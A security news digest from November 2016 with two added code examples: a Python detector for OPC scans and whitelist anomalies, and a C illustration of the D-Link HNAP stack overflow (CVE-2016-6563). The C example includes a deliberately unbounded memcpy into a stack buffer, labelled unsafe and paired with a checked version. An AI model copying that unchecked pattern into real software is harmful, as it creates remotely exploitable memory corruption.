Analyse reports on the number of times each UseCase has triggered alongside the appearance of the indicators present in the logic of the UseCases. Determine whether the UseCases are erroneous or no longer valid.

Submit a report to the Content Management team to repair erroneous UseCases and archive UseCases which are no longer useful or relevant to the SOC.

Removing unnecessary or defunct UseCases will help keep the UseCase library current and in line with the current threat landscape, and will also assist production appliance optimisation and good maintenance.
Respond: Optimize and Advance roles
i) Expand Hunting and Attribution capabilities to include dark net operations.
ii) Expand L2 analyst capabilities to include malware analysis and basic remote forensic collection and analysis of forensic images.
iii) Expand L1 analyst capabilities to triage, analysis, response and closure of low-priority incidents.
Enhance: Management reporting and Success factors
Conduct 6-monthly reviews to gauge success, knowledge gaps and training requirements.

Run 6-monthly and annual reports highlighting costs saved as a direct or indirect result of breach prevention and breach disruption. Use this data to justify funding in order to enhance and advance the SOC via analyst training, appliance upgrades and user awareness events.

The above process is only one step towards the development of a mitigation process for ICS environments. Organizations need to avoid siloed, compartmentalised working and a ‘not in my backyard’ mentality in order to develop a more robust, holistic process. See the RSA blog next week for the framework analysis.
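Two pieces of the strategy above lend themselves directly to code: Report 1 “Critical Anomaly” (whitelist the expected conversations of critical systems and report the residue) and ICS UseCase #1 “Unusual/Unplanned OPC Scan”. The following added example (not RSA's code) implements both over a constructed set of net-flow records; the cell layout, addresses and whitelist are assumptions. The port choices reflect common ICS protocols (S7comm on TCP 102, Modbus/TCP on 502, and TCP 135 as the DCOM endpoint mapper that classic OPC uses), so a single source touching many hosts on 135 is treated as scan-like.

```python
from collections import Counter, defaultdict
from typing import Dict, List, NamedTuple, Set, Tuple


class Flow(NamedTuple):
    src: str
    dst: str
    dport: int
    proto: str
    nbytes: int


# Constructed ICS cell: the critical systems under watch.
CRITICAL_HOSTS = {"10.10.1.5": "PLC-01", "10.10.1.20": "HMI-01", "10.10.1.30": "OPC-SRV-01"}

# Expected conversations as (src, dst, dport); "*" matches anything.
WHITELIST: Set[Tuple[str, str, object]] = {
    ("10.10.2.50", "10.10.1.5", 102),   # engineering workstation -> PLC (S7comm)
    ("10.10.1.20", "10.10.1.5", 102),   # HMI -> PLC
    ("10.10.3.7", "10.10.1.30", 135),   # historian -> OPC server (DCOM)
    ("*", "10.10.1.20", 443),           # anyone -> HMI web interface
}

# Constructed 30-day flow sample (heavily abridged), not real traffic.
SAMPLE_FLOWS = [
    Flow("10.10.2.50", "10.10.1.5", 102, "tcp", 4200),
    Flow("10.10.1.20", "10.10.1.5", 102, "tcp", 1800),
    Flow("10.10.3.7", "10.10.1.30", 135, "tcp", 900),
    Flow("10.10.2.12", "10.10.1.20", 443, "tcp", 30000),
    Flow("10.10.2.99", "10.10.1.5", 445, "tcp", 120),   # SMB to a PLC: not expected
    Flow("10.10.2.99", "10.10.1.5", 502, "tcp", 60),    # Modbus probe from an unknown host
    Flow("10.10.2.99", "10.10.1.5", 135, "tcp", 60),
    Flow("10.10.2.99", "10.10.1.20", 135, "tcp", 60),
    Flow("10.10.2.99", "10.10.1.30", 135, "tcp", 60),
    Flow("10.10.2.99", "10.10.1.31", 135, "tcp", 60),
    Flow("10.10.2.99", "10.10.1.32", 135, "tcp", 60),
]


def is_expected(flow: Flow, whitelist) -> bool:
    return any(s in ("*", flow.src) and d in ("*", flow.dst) and p in ("*", flow.dport)
               for s, d, p in whitelist)


def critical_anomaly_report(flows: List[Flow], whitelist, critical_hosts) -> Dict[str, Counter]:
    """Report 1: per critical host, the traffic left after removing whitelisted
    conversations, counted per (peer, dport). Only hosts with residue appear."""
    report = {name: Counter() for name in critical_hosts.values()}
    for f in flows:
        if is_expected(f, whitelist):
            continue
        for ip, name in critical_hosts.items():
            if f.dst == ip:
                report[name][(f.src, f.dport)] += 1
            elif f.src == ip:
                report[name][(f.dst, f.dport)] += 1
    return {name: c for name, c in report.items() if c}


def detect_opc_scan(flows: List[Flow], min_targets: int = 4) -> Dict[str, List[str]]:
    """UseCase #1: one source contacting at least min_targets distinct hosts on
    TCP 135 (the DCOM endpoint mapper classic OPC relies on) looks like a scan."""
    targets = defaultdict(set)
    for f in flows:
        if f.dport == 135 and f.proto == "tcp":
            targets[f.src].add(f.dst)
    return {src: sorted(dsts) for src, dsts in targets.items() if len(dsts) >= min_targets}


if __name__ == "__main__":
    for host, residue in critical_anomaly_report(SAMPLE_FLOWS, WHITELIST, CRITICAL_HOSTS).items():
        print(host, dict(residue))
    print("OPC scan candidates:", detect_opc_scan(SAMPLE_FLOWS))
```

The residue report is what goes into the meeting with the system owners: each (peer, port) line either becomes a new whitelist entry (it was planned traffic nobody had documented) or the seed of a new UseCase. The scan threshold is deliberately a parameter, because a legitimate OPC client enumerating a handful of servers should not trip it.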

Who attacked Tesco Bank’s clients? And is something similar being prepared in the Czech Republic?

10.11.2016 SecurityWorld Hacking
By all accounts, the theft of money from the accounts of twenty thousand Tesco Bank clients is the work of malicious code that poses as an order, invoice or similar document in an e-mail.

“The result of the infection is that the Retefe malicious code we detected modifies the internet banking page displayed to the bank’s client in his browser, and then tries to collect the victim’s login credentials,” says Miroslav Dvořák, technical director of Eset.

“In some cases it also lures the victim into installing a mobile component of this malicious code on their mobile device, which we detect as Android/Spy.Banker.EZ,” adds Dvořák.

According to British media, funds were stolen in this way from the accounts of twenty thousand Tesco Bank clients. The institution also suspended all online transactions for 140 thousand customers.

The Retefe malware can modify internet banking pages in all major web browsers, including Google Chrome, Mozilla Firefox and Internet Explorer. Eset warns that Tesco Bank clients may not be the attackers’ only target.

The authors of the malicious code have also targeted clients of other banks in Britain and in German-speaking countries. Eset is currently contacting these banks with a warning about the threat, which could cost their clients money.

Eset says it has the material needed to analyse the Retefe code thanks to its active monitoring of malicious code through its Threat Intelligence service. The service is currently available in the Czech Republic and Slovakia, and the company says it will launch it in other countries in the coming months.

Microsoft Patches Windows Zero-Day Flaw Disclosed by Google
10.11.2016 thehackernews Vulnerebility
Microsoft was very upset with Google last week when its Threat Analysis Group publicly disclosed a critical Windows kernel vulnerability (CVE-2016-7255) that had yet to be patched.
The company criticized Google's move, claiming that the disclosure of the vulnerability, which was being exploited in the wild, put its customers "at potential risk."
The vulnerability affects all Windows versions from Windows Vista through current versions of Windows 10, and Microsoft was set to issue a fix come this month's Patch Tuesday.
So, as part of its monthly Patch Tuesday, Microsoft today patched the security flaw in Windows that was actively being exploited by hackers.
According to Microsoft's security bulletin released today, any hacker who tricked victims into running a "specially-crafted application" could successfully exploit the system bug and gain the ability to "install programs; view, change, or delete data; or create new accounts with full user rights."
Once exploited, the bug could be used to escape the sandbox protection and execute malicious code on the compromised Windows machine.
Rated as "important," the vulnerability was being exploited by the Strontium group, also known as Fancy Bear, Sofacy, and APT 28, in targeted attacks.
Fancy Bear is the same group of hackers that has also been accused by the US Intelligence community of hacking the Democratic National Committee, Clinton Campaign Chair John Podesta, and former Secretary of State Colin Powell, among others.
Besides this controversial flaw exposed by Google last week, the security bulletin also fixes multiple elevation of privilege bugs.
Patch Tuesday also contains several critical security patches that affect all versions of Windows as well as other important updates and fixes for both Internet Explorer and Edge.
So, I strongly recommend that home users and companies ensure their Windows PCs are up to date with all of Microsoft's latest security fixes as of today.

The popular Flash Player is full of holes. Again

9.11.2016 Novinky/Bezpečnost Zranitelnosti
Several security flaws have been found in Flash Player. Adobe, the company behind this popular application for playing internet videos, has already released patches for all the holes. Given the possible risks, users should not delay installing them.
Adobe released several security fixes only last week. Back then, cyber criminals could use the discovered flaws to get into an attacked machine and run arbitrary malicious code on it.

In practice, cybercriminals can cause the same damage with the newly discovered flaws, which the National Security Team CSIRT.CZ has warned about.

As already mentioned above, fixes are already available. “The newly released security patches for Flash Player fix several serious vulnerabilities that allow arbitrary code execution,” confirmed Pavel Bašta, security analyst of the CSIRT.CZ team, which is operated by the CZ.NIC association.

In other words, using these flaws, pirates can smuggle practically any virus onto someone else’s computer.

Another batch of fixes after a week
Given the current threat, Adobe is forced to release another batch of updates just one week after the previous holes were fixed.

Although the situation may seem alarming, it is simply a consequence of Flash Player being very popular. Tens of millions of people around the world use this internet video player, which is precisely why cybercriminals target it so often.

The patch can be obtained through the program’s automatic updates or from Adobe’s website.

DDoS Attack Takes Down Central Heating System Amidst Winter In Finland
9.11.2016 thehackernews Attack
Just imagine: you come home from chilling weather outside, and the heating system fails to work because of a cyber attack, leaving you in a state of panic.
That is what happened late last month, when an attack knocked a heating system offline in Finland.
Last week, a Distributed Denial of Service (DDoS) attack led to the disruption of the heating systems for at least two housing blocks in the city of Lappeenranta, literally leaving their residents in subzero weather.
Both the apartments are managed by a company called Valtia, a facilities services company headquartered in Lappeenranta.
Valtia CEO Simo Rounela confirmed to an English-language news outlet that the central heating system and hot water system in both buildings had become the target of DDoS attacks.
In an attempt to fight back against the cyber attacks, which lasted only a short time, the automated systems rebooted, and unfortunately got stuck in an endless loop, restarting repeatedly and eventually shutting down the heating systems for more than a week.
The incident is extremely worrying because in a location as cold as Finland, where temperatures at this time of year are below freezing, taking heating systems offline for over a week could result in death, particularly among the elderly.
Fortunately for the buildings' residents, it was not that cold in Lappeenranta.
The attack started in late October and ended on 3rd November afternoon. Here's what a brief post on the company's website reads:
"Over 90 percent of the [remote systems] in the area of terraced houses or larger buildings will not send an alarm at the moment, even if the heat is switched off or radiator pressure disappears," as the systems are designed to shut down for safety. "The systems must be actively monitored and adjusted."
According to another local media outlet, Helsingin Sanomat, Valtia quickly relocated those affected systems and switched the heating systems over to manual, while the company addressed the DDoS attacks and brought the control systems "back into the grid, this time from behind a firewall."
The report attributes the cyber attack to the Mirai botnet, the same infamous IoT botnet that caused a vast internet outage over two weeks ago by launching massive DDoS attacks against DNS provider Dyn.
Dangerous Threats of Massive IoT Botnets
The Mirai botnet malware scans for insecure IoT devices, like security cameras, DVRs, and routers, that still use their default passwords, and enslaves them into a botnet that is then used to launch DDoS attacks.
The latest incident isn't a disaster, but it is enough to make crystal clear that Internet-connected systems can have significant consequences in the physical world as well.
Just imagine if these control systems could not be manually adjusted by the people who truly rely on them.
In that case, any cyber attack that knocks these systems down is potentially dangerous and even deadly in the event of extreme temperatures.
This incident once again highlights the dangerous threat of massive DDoS attacks, which are now emerging from millions of insecure Internet of Things (IoT) devices; attackers can simply launch a DDoS to take down any critical service, with no need to infect it with malware or viruses.
So the best way to protect your smart devices from being a part of DDoS botnet is to be more vigilant about the security of your internet-connected devices.

Over 300,000 Android Devices Hacked Using Chrome Browser Vulnerability
9.11.2016 thehackernews Android
A vulnerability in Chrome for Android is actively being exploited in the wild that allows hackers to quietly download banking trojan apps (.apk) onto victims' devices without their confirmation.
You might have encountered a pop-up advertisement that appears out of nowhere, warns you that your mobile device has been infected with a dangerous virus, and instructs you to install a security app to remove it immediately.
This malicious advertising web page automatically downloads an Android app installation (.apk) file to your device without requiring any approval.
Citing malware threats on your mobile device, attackers trick you into changing your device's settings to allow installation of third-party apps from stores other than the Google Play Store, and then into installing the banking trojan app on your device.
Kaspersky researchers Mikhail Kuzin and Nikita Buchka discovered one such widespread malicious advertising campaign across Russian news sites and popular websites.
Since this August, the Trojan has infected over 318,000 Android devices across the world, thanks to Google AdSense advertisements that were being abused to spread the malicious mobile banking trojan, dubbed Svpeng.
"When an APK file is broken down into pieces and handed over to the save function via Blob() class, there is no check for the type of the content being saved, so the browser saves the APK file without notifying the user," the duo explains in a blog post.
Google has acknowledged the issue, blocked the malicious ads and planned to patch it, although it is unclear when the next Android Chrome version will be released.
However, if Google sticks to its six-week release cycle, users can expect an update on 3rd December 2016. So, malicious actors have over three weeks to exploit the flaw.
"[The] next time they (criminals) push their adverts on AdSense they may well choose to attack users in other countries; we have seen similar cases in the past; After all, what could be more convenient than exploiting the most popular advertising platform to download their malicious creations to hundreds of thousands of mobile devices?" the pair say.
Even if Google patches this issue with its next software update, attackers still have an evergreen technique to trick users into downloading malicious apps: exploiting vulnerabilities in popular websites.
For example, a recently disclosed XSS (Cross-Site Scripting) flaw on WhatsApp's official website, discovered by Indian security researcher Jitendra Jaiswal, could allow attackers to trick users into downloading malware applications.
So, it is always a good idea to install apps only from the official Google Play Store and not to change the default Android settings that prevent the installation of third-party apps.
So, the best recommendation for users is to think twice before installing any app (no matter how legitimate it looks) from untrusted sources or clicking on suspicious-looking links.

What does a DDoS have to do with everyday life? DDoS knocks out building control systems in Finland
9.11.2016 securityaffairs Attack
The residents of two apartment buildings in Finland faced more than a week of serious problems due to a DDoS attack that targeted the building control systems.
What does a DDoS have to do with everyday life? The recent attack against the Dyn DNS service, powered by an IoT botnet, demonstrated how vulnerable modern society is to cyber threats.

Anyway, to explain this strong dependency to a non-tech-savvy reader, it could be useful to share the news story I'm going to tell you.

The residents of two apartment buildings in Lappeenranta, Finland, faced more than a week of serious problems due to a DDoS attack that targeted the building control systems.

The cyber attack targeted the building management systems and halted the heating distribution. The systems were isolated from the Internet and went into an endless loop of reboot attempts trying to reestablish normal operation.

“A Distributed Denial of Service (DDoS) attack halted heating distribution at least in two properties in the city of Lappeenranta, located in eastern Finland. In both of the events the attacks disabled the computers that were controlling heating in the buildings.” reported the news outlet.

The equipment targeted in the attack was built by the company Fidelix, whose representative Antti Koskinen confirmed that other similar attacks had hit systems in the country.


The apartments are managed by a company called Valtia; Simo Rounela, CEO of the company, told Etelä-Saimaa that the DDoS attack hit the building management systems.

I believe that we cannot underestimate this kind of incident: building management systems are an easy target for cyber criminals and hackers. It is quite easy to locate web-based HMI/SCADA interfaces for building automation and other building control systems that are exposed online. Search engines like Shodan and Censys can locate any kind of online computer system, providing attackers with useful information to mount a cyber attack.

In many cases, building control systems are not properly configured, and there are no specific measures in place to protect them.

Consider also that it is very easy and cheap to mount a DDoS attack today; the criminal underground is full of actors offering DDoS botnets for rent and other kinds of booter services.

The Valtia company published an official announcement confirming the attack and highlighting the risks of such attacks in the area.

“The local newspaper Etelä-Saimaa ran a story last week about a denial of service attack on real estate automation systems.

Similar attacks are easy to fend off with a firewall or any other security solution. In this case, the possible attacks are stopped and the actual control system continues to operate normally. Existing systems behind a firewall do not even tend to be attacked, so the situation will improve in that respect,” says Valtia.

At the same time, discussions have asked why the systems must be connected to the network at all. Here are a couple of examples from customers:

– Alarms
Over 90% of the terraced houses or larger buildings in the area will not send an alarm at the moment, even if the heat is switched off or radiator pressure disappears. In this case, the damage will increase, repair time will increase and costs rise.

– Management
The systems must be actively monitored and adjusted. Some of this work can be done remotely via a computer, such as temperature setpoints and ventilation controls. Some work must still be done on site, but rarely. This brings direct savings in costs and speeds up the work considerably. Sometimes the destination cannot be more than 100 kilometers from the maintenance office.”

The incident highlights the importance of proper management of building control systems, with particular attention to their cyber security. These systems have to be properly configured and their software continually updated in order to fix security vulnerabilities discovered across their lifecycle.

“Building maintenance specialist Sami Orasaari confirms that building automation security is often neglected. Many housing companies or private owners do not want to invest in network firewalls and that security in general tends to be lax. In this case the devices targeted were attacked because they’ve been found to be vulnerable and the attackers have scanned the network to find more of them.” reported the

“The cause of the issues were not apparent to regular maintenance task, because they have little or no training related to network attacks against the systems they routinely operate. The attack comes following a series of attacks done using so-called Internet of Things (IoT) devices.”

CVE-2016-6563 RCE flaw affects D-Link Routers, disable remote admin
9.11.2016 securityaffairs Vulnerability
Carnegie Mellon CERT warns of a flawed implementation of HNAP in D-Link routers (CVE-2016-6563) that could be exploited for remote code execution.
According to the Carnegie-Mellon CERT the implementation of the Home Network Automation Protocol (HNAP) of D-Link routers is affected by a stack-based buffer overflow vulnerability tracked as CVE-2016-6563.

The flaw could be exploited by a remote, unauthenticated attacker to execute arbitrary code with root privileges.

“Processing malformed SOAP messages when performing the HNAP Login action causes a buffer overflow in the stack. The vulnerable XML fields within the SOAP body are: Action, Username, LoginPassword, and Captcha,” reads the advisory.

The D-Link routers affected by the CVE-2016-6563 flaw belonging to the DIR family are:

[Image: affected D-Link DIR routers, including the DIR-895L]

According to the Carnegie Mellon CERT, D-Link hasn’t fixed the problem; the only workaround is to disable remote administration.

The bad news is that a Metasploit proof-of-concept exploit has been published by security expert Pedro Ribeiro of Agile Information Security.

Ribeiro explained that the issue is caused by fields accepting arbitrarily long strings that are copied onto the stack.

“Several Dlink routers contain a pre-authentication stack buffer overflow vulnerability, which is exposed on the LAN interface on port 80. This vulnerability affects the HNAP SOAP protocol, which accepts arbitrarily long strings into certain XML parameters and then copies them into the stack. This exploit has been tested on the real devices DIR-818LW and 868L (rev. B), and it was tested using emulation on the DIR-822, 823, 880, 885, 890 and 895. Others might be affected, and this vulnerability is present in both MIPS and ARM devices,” reads Ribeiro’s description of CVE-2016-6563. “The MIPS devices are powered by Lextra RLX processors, which are crippled MIPS cores lacking a few load and store instructions. Because of this the payloads have to be sent unencoded, which can cause them to fail, although the bind shell seems to work well. For the ARM devices, the inline reverse tcp seems to work best. Check the reference links to see the vulnerable firmware versions.”

Ribeiro found two ways to trigger the vulnerability: passing a vulnerable field a string longer than 3096 bytes, or overrunning the stack of the calling function, hnap_main, with 2048+ bytes.

This isn’t the first time experts have found a flaw in D-Link’s HNAP implementation; many years ago, experts at SourceSec Security Research discovered similar issues in the service.
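The pattern Ribeiro describes, as a constructed C illustration (not D-Link's firmware code): a SOAP field value copied into a fixed-size stack buffer with no length comparison, next to the bounds check that would have rejected an over-long field before the copy. HNAP_FIELD_MAX (set to the 3096-byte figure quoted above), the tag names and all function names are assumptions made for this example.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Constructed illustration; the field size mirrors the 3096-byte figure above. */
#define HNAP_FIELD_MAX 3096

/* Find the text between <tag> and </tag> in a SOAP body. Returns a pointer to
 * the first byte of the value and stores its length in *len, or NULL when the
 * tag is missing or unterminated. */
static const char *find_field(const char *body, const char *tag, size_t *len)
{
    char open_tag[64], close_tag[64];
    const char *start, *end;

    if (strlen(tag) > 60)
        return NULL;
    snprintf(open_tag, sizeof open_tag, "<%s>", tag);
    snprintf(close_tag, sizeof close_tag, "</%s>", tag);

    start = strstr(body, open_tag);
    if (start == NULL)
        return NULL;
    start += strlen(open_tag);
    end = strstr(start, close_tag);
    if (end == NULL)
        return NULL;
    *len = (size_t)(end - start);
    return start;
}

/* UNSAFE pattern, as described in the advisory: the value is copied into a
 * fixed-size stack buffer without comparing its length to the buffer size,
 * so a value longer than HNAP_FIELD_MAX overruns the stack frame. Kept only
 * to show the missing check; never feed it untrusted input. */
int parse_field_unchecked(const char *body, const char *tag)
{
    char field[HNAP_FIELD_MAX];
    size_t len;
    const char *src = find_field(body, tag, &len);

    if (src == NULL)
        return -1;
    memcpy(field, src, len);        /* len is never bounded */
    field[len] = '\0';
    return (int)strlen(field);
}

/* HARDENED: refuse the request before copying when the value cannot fit,
 * leaving room for the terminator. Returns the value length, or -1. */
int parse_field_checked(const char *body, const char *tag, char *out, size_t out_sz)
{
    size_t len;
    const char *src = find_field(body, tag, &len);

    if (src == NULL)
        return -1;
    if (len >= out_sz)              /* the check the unchecked version lacks */
        return -1;
    memcpy(out, src, len);
    out[len] = '\0';
    return (int)len;
}

/* Build a constructed Login request whose Username is n bytes long and run it
 * through the checked parser. Returns 1 if the value was accepted intact. */
int checked_accepts_username_of_length(size_t n)
{
    static char body[HNAP_FIELD_MAX + 256];
    char out[HNAP_FIELD_MAX];
    const char *head = "<Login><Action>request</Action><Username>";
    const char *tail = "</Username><LoginPassword>x</LoginPassword></Login>";
    size_t pos;

    if (strlen(head) + n + strlen(tail) + 1 > sizeof body)
        return 0;                   /* request too large for this harness */
    memcpy(body, head, strlen(head));
    pos = strlen(head);
    memset(body + pos, 'A', n);
    pos += n;
    memcpy(body + pos, tail, strlen(tail) + 1);   /* copies the terminator too */
    return parse_field_checked(body, "Username", out, sizeof out) == (int)n;
}

int main(void)
{
    printf("3095-byte Username accepted: %d\n", checked_accepts_username_of_length(3095));
    printf("3096-byte Username accepted: %d\n", checked_accepts_username_of_length(3096));
    return 0;
}
```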

Adobe issued security patches for 9 Flash Player flaws reported via ZDI
9.11.2016 securityaffairs Vulnerability
Adobe released security updates that address nine vulnerabilities in Flash Player that could be exploited for remote code execution.
Adobe has released security updates to address one vulnerability in Connect for Windows and nine arbitrary code execution flaws in the Flash Player product.
The patches issued by the company for Adobe Flash Player are available for Windows, Macintosh, Linux and Chrome OS. An attacker can exploit the critical vulnerabilities to take full control of the vulnerable system.

“Adobe has released security updates for Adobe Flash Player for Windows, Macintosh, Linux and Chrome OS. These updates address critical vulnerabilities that could potentially allow an attacker to take control of the affected system.” reads the description published by Adobe.

Flash Player for Windows, Mac and web browsers, and Flash Player for Linux resolve type confusion and use-after-free vulnerabilities tracked as CVE-2016-7857, CVE-2016-7858, CVE-2016-7859, CVE-2016-7860, CVE-2016-7861, CVE-2016-7862, CVE-2016-7863, CVE-2016-7864 and CVE-2016-7865.
All the flaws fixed with this last round of security patches have been reported to Adobe through Trend Micro’s Zero Day Initiative (ZDI). The vulnerabilities have been reported by several security experts, including bo13oy of CloverSec Labs, Archer, Kiritou Kureha, Erisaka Mafuyu, Onoe Serika, Kuchiki Toko and Takanashi Rikka.


The flaw in the Connect update that was reported by Vulnerability Lab is an input validation vulnerability in the events registration module. The flaw can be exploited for cross-site scripting (XSS) attacks.

The Connect 9.5.7 release fixes security vulnerabilities in versions 9.5.6 and earlier for Windows.

Adobe said there was no evidence that any of these vulnerabilities had been exploited in the wild.

Recently Adobe fixed a Flash Player vulnerability, tracked as CVE-2016-7855, that was exploited by the Russian Fancy Bear APT in targeted attacks.

The vulnerability is a use-after-free issue that can be triggered by attackers for arbitrary code execution.

Microsoft patches CVE-2016-7255 Windows zero-day exploited by Fancy Bear
9.11.2016 securityaffairs Vulnerability
Microsoft has issued a security patch that fixes the zero-day vulnerability tracked as CVE-2016-7255 exploited by Russian hackers.
Microsoft has issued security patches that also fix the zero-day vulnerability exploited by Russian hackers.

The zero-day, tracked as CVE-2016-7255, has been patched in the MS16-135 bulletin, which also addresses two information disclosure and three privilege escalation vulnerabilities. The zero-day was exploited by attackers to gain administrator-level access by escaping sandbox protection and executing malicious code.

Google chose to publicly disclose the flaw just 10 days after privately reporting it to Microsoft, giving the company very little time to issue security updates.

According to Google, the reason for going public without waiting for a patch is that its experts have observed exploits for the flaw in the wild.

Microsoft criticized the Google decision because the disclosure potentially puts customers at risk.

“We believe in coordinated vulnerability disclosure, and today’s disclosure by Google puts customers at potential risk,” a Microsoft spokesperson said in a statement. “Windows is the only platform with a customer commitment to investigate reported security issues and proactively update impacted devices as soon as possible. We recommend customers use Windows 10 and the Microsoft Edge browser for the best protection.”

According to Microsoft, the CVE-2016-7255 vulnerability had been exploited in a limited number of spear-phishing attacks powered by the Russian hacker group known as Pawn Storm, APT28, Fancy Bear, Sofacy, Sednit, and Tsar Team.

Russian hackers also exploited a zero-day flaw (CVE-2016-7855) in Flash Player that Adobe promptly fixed by issuing an emergency patch.

According to the security advisory issued by Adobe, the CVE-2016-7855 has been exploited in targeted attacks. The vulnerability is a use-after-free issue that can be triggered by attackers for arbitrary code execution.


The latest Microsoft Patch Tuesday includes a critical security bulletin, MS16-132, that addresses several issues in the Windows Media Foundation, the Windows Animation Manager and OpenType fonts.

The bulletin MS16-132 also fixed the remote code execution vulnerability (CVE-2016-7256) that according to Microsoft has been exploited in the wild via specially crafted websites or documents that victims must open in order to trigger the exploit.

The bulletin MS16-129 fixed other vulnerabilities, including a browser information disclosure vulnerability (CVE-2016-7199) and an Edge spoofing flaw (CVE-2016-7209).

The complete list of Microsoft Security Bulletins for November 2016 is available here:

Adobe also issued security patches for 9 Flash Player flaws reported via ZDI.

The company has released security updates to address one vulnerability in Connect for Windows and nine arbitrary code execution flaws in the Flash Player product.

Ransomware keeps spreading fear: the number of victims of extortion viruses is growing

8.11.2016 Novinky/Bezpečnost Viruses
Extortion viruses, grouped under the umbrella term ransomware, pose an ever greater risk to users. In the third quarter of this year the number of victims of these malicious codes even rose sharply. This follows from an analysis by the antivirus company Kaspersky Lab.
How does an extortion virus attack proceed?

Attacks by extortion viruses almost always follow exactly the same pattern. First, the attackers encrypt all data stored on the hard drive. They then demand a ransom for making it accessible again, easily several thousand crowns.
Cybercriminals usually try to give the owner of the infected machine the impression that they will regain access to their files after paying a fine, supposedly levied for using illegal software and the like. This is one reason many people have already paid the ransom.
Even after paying the ransom, however, users do not get their data back. Instead of paying, the virus must be removed from the computer. Recovering data that was not backed up is impossible in most cases.
The number of victims of extortion viruses grew 2.6-fold in the third quarter. In other words, over those three months more than 821 thousand people from various corners of the world became victims.

The victims most often come from Japan (4.83%), Croatia (3.71%), South Korea (3.36%), Tunisia (3.22%) and Bulgaria (3.2%). In the previous quarter Japan was also in first place, but second, third and fourth place were occupied by Italy, Djibouti and Luxembourg.

The analysis does not say what share of the affected users are Czech.

CTB-Locker spreads most often
The extortion virus most widely spread by computer pirates is CTB-Locker, which is responsible for almost a third of all attacks carried out (28.34%). It encrypts the data stored on the hard drive and demands a ransom in bitcoins to unlock it, the equivalent of almost 50 thousand crowns.

It is worth recalling that people should not pay the ransom, because they have no guarantee that the data will actually be made accessible. Similar cases in the past even show that the data is practically never decrypted. The only solution is to clean the computer.

The same applies to the other two extortion viruses at the top of the ranking. Second in the third quarter was the malicious code Locky (9.6%) and third CryptXXX (8.95%).

There are tens of thousands of extortion viruses
There are, of course, far more extortion viruses. "Crypto-ransomware remains one of the biggest threats for both end users and companies. The current jump in the number of attacked users may be caused by the fact that, compared with the previous quarter, we recorded three and a half times more ransomware modifications, more than 32,000 different forms in total," noted Fedor Sinitsyn, ransomware expert at Kaspersky Lab.

"The reason for such a high number may also be the considerable investments in security solutions that allow companies to detect new ransomware cases as quickly as possible. The criminals therefore have no choice but to keep creating new modifications of their malware," Sinitsyn added.

Facebook agrees to Stop using UK Users' WhatsApp Data for Targeted Ads
8.11.2016 thehackernews Social
In August, Facebook introduced a hugely controversial data sharing plan to start harvesting data from its WhatsApp messaging app from September 25 for delivering more relevant ads on the social network.
Many users were not happy with the move, because there was no real way of opting out from the data sharing – WhatsApp users could only do so within a short period – and even if users did opt out then, some data would still be shared.
Eventually, some countries like Britain stood up and opposed the decision.
The Information Commissioner's Office (ICO) of the United Kingdom has asked Facebook and WhatsApp to better explain the changes to their customers in the U.K., and if they don't, the ICO could hand out a heavy fine.
What's the good news?
In response, the social media giant has agreed to "pause" sharing of data, including their phone numbers, between WhatsApp and Facebook in Britain to target advertisements on its core social network.
"We have now asked Facebook and WhatsApp to sign an undertaking committing to better explaining to customers how their data will be used, and to giving users ongoing control over that information," Elizabeth Denham, the Information Commissioner, wrote in a blog post.
"I don't think users have been given enough information about what Facebook plans to do with their information, and I don't think WhatsApp has got valid consent from users to share the information."
When Facebook announced this deal in late August, Denham said she would investigate the changes under Britain's data protection laws, and she has now issued an update revealing that the social networking giant has agreed to hold off on sharing data from UK users.
Denham said that users have the right to control their data, and she now wants Facebook and WhatsApp to let users restrict access to their information beyond the existing 30-day period and to opt out of the agreement completely at any time.
When Facebook acquired WhatsApp for $19 billion in 2014, users were worried about the company's commitment to protecting their privacy, but WhatsApp reassured them that their privacy would not be compromised in any way.
But after the deal, the WhatsApp users felt betrayed by the company.
After introducing end-to-end encryption, WhatsApp has become one of the most popular secure messaging apps, but this shift in its privacy policy may force some users to switch to other secure apps like Telegram and Signal.
Neither Facebook nor WhatsApp has yet responded to the Information Commissioner's announcement.

'Web Of Trust' Browser Add-On Caught Selling Users' Data — Uninstall It Now
8.11.2016 thehackernews Security
Browser extensions have become a standard part of the most popular browsers and an essential part of how we surf the Internet.
But not all extensions can be trusted.
One such innocent-looking browser add-on has been caught collecting the browsing history of millions of users and selling it to third parties for profit.
An investigation by German television channel NDR (Norddeutscher Rundfunk) has discovered a series of privacy breaches by Web Of Trust (WOT) – one of the top privacy and security browser extensions used by more than 140 Million online users to help keep them safe online.
Web of Trust has been offering a "Safe Web Search & Browsing" service since 2007. The WOT browser extension, which is available for both Firefox and Chrome, uses crowdsourcing to rate websites based on trustworthiness and child safety.
However, it turns out that the Web of Trust service collects extensive data about netizens' web browsing habits via its browser add-on and then sells it off to various third-party companies.
What's extremely worrying is that Web of Trust did not properly anonymize the data it collects on its users, which means it is easy to expose a user's real identity and every detail about them.
The WOT Privacy Policy states that your IP address, geo-location, the type of device, operating system, and browser you use, the date and time, Web addresses, and browser usage are all collected, but they are in "non-identifiable" format.
However, NDR found that it was very easy to link the anonymized data to its individual users.
The reporters focused on just a small data sample of around 50 WOT users, and were able to retrieve a lot of data, which included:
Account name
Mailing address
Shopping habits
Travel plans
Possible illnesses
Sexual preferences
Drug consumption
Confidential company information
Ongoing police investigations
Browser surfing activity including all sites visited
This data belonged to just 50 users, and WOT has more than 140 Million users. From here, you can imagine why the whole matter is of huge concern.
Mozilla has already removed the WOT extension from Firefox Add-ons page, and WoT, in turn, removed the extension from the Chrome Web Store as well.
In a statement, WOT said "we take our obligations to you very seriously. While we deployed great effort to remove any data that could be used to identify individual users, it appears that in some cases such identification remained possible, albeit for what may be a very small number of WOT users," claiming that they are taking these steps:
Reviewing our privacy policy to determine which changes need to be made to enhance and ensure that our users' privacy rights are properly addressed.
For the user browsing data used to enable WOT website reputation service, we intend to provide users the ability to opt-out of having such data saved in our database or shared. This opt-out will be available from the settings menu, as we want to provide each user with a clear choice at all times.
For people who agree to let us use their browsing data to support WOT, we will implement a complete overhaul of our data 'cleaning' process, to optimize our data anonymization and aggregation objectives to minimize any risk of exposure for our users.
For now, anyone using the WOT extension is strongly advised to uninstall it immediately. WOT also has a mobile app that will not be immune to this data collection.

WikiLeaks published DNCLeak2, but someone DDoSed it
8.11.2016 securityaffairs Attack

WikiLeaks confirmed that its email publication servers have suffered a massive DDoS attack since it published a new set of hacked DNC emails dubbed DNCLeak2.
